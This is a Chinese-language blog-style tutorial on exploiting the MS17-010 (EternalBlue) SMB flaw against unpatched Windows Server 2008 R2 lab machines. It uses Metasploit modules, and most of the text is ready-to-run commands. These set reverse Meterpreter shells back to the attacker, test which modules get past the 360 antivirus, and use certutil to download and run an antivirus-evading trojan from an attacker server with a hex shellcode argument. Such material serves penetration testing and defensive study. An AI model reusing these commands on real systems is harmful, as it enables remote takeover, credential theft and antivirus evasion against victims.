前言
在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。
环境搭建
这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机
kali 192.168.164.155
靶机1 192.168.164.156
靶机2 192.168.164.161(丢一个360的安装包进去,等会要用)
靶机2还要开启命名管道的匿名访问
打开cmd 执行gpedit.msc,在计算机配置->windwos设置->安全设置->本地策略->安全选项,修改限制对命名管道和共享的匿名访问为已禁用
之后重启靶机2
漏洞
首先打开msf,搜索17010相关的模块
msfconsole
search 17-010
漏洞检测
auxiliary/scanner/smb/smb_ms17_010
漏洞检测方法
use auxiliary/scanner/smb/smb_ms17_010
之后设置一下目标ip和线程即可,这里因为已知ip和存在漏洞就不演示了
漏洞利用常使用的是
auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec
这里的第一个和第三个模块需要目标开启明明管道,并且比较稳定,第二个模块只要存在漏洞即可,但是会有概率把目标打蓝屏,而且杀软拦截也会比较严格,如果有杀软就基本可以放弃这个模块了
无杀软情况
无杀软的话可以先使用auxiliary/admin/smb/ms17_010_command模块探测一下是否可以使用命名管道
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.164.156 192.168.164.161
set command tasklist
show options
run
如果命令执行成功的话就可以优先考虑
auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_psexec
两个模块进行利用,第一个模块执行命令远程下载,之后在执行下载的muma,
第二个模块psexec直接设置目标的地址,之后执行就可以了
exploit/windows/smb/ms17_010_eternalblue不建议使用,有概率使目标蓝屏
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.164.156
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run
有杀软情况
这里就对模块进行测试,某卫士对不同模块的反应,双击靶机2上的360安装包,之后进行安装
首先是exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.164.161
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run
msf这边很快就“完成了”攻击,
exploit/windows/smb/ms17_010_psexec模块
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.164.161
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run
抓取密码
这边全程某卫士都没有反应
auxiliary/admin/smb/ms17_010_command模块
首先要准备好免杀muma,之后保存到vps上,这里为了方便就保存在局域网内,
再打开一个msf,监听shell
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
set lport 443
run
use auxiliary/admin/smb/ms17_010_command
set command certutil -urlcache -split -f http://192.168.164.138/met.exe %temp%/abc.exe
set rhosts 192.168.164.161
run
set command "%temp%/abc.exe fc4883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc020001bbc0a8a49b41544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a0a415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5"
run
某卫士也是全程无反应
如果自己的服务器没有访问日志的话就要检查下模板是否出网或者是否被拦截或者被杀,有访问日志的话,要等几分钟之后再次去执行命令运行
参考文章
https://docs.microsoft.com/zh-cn/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares
http://t3ngyu.leanote.com/post/MS17-010
https://jingyan.baidu.com/article/09ea3edec478a981afde3941.html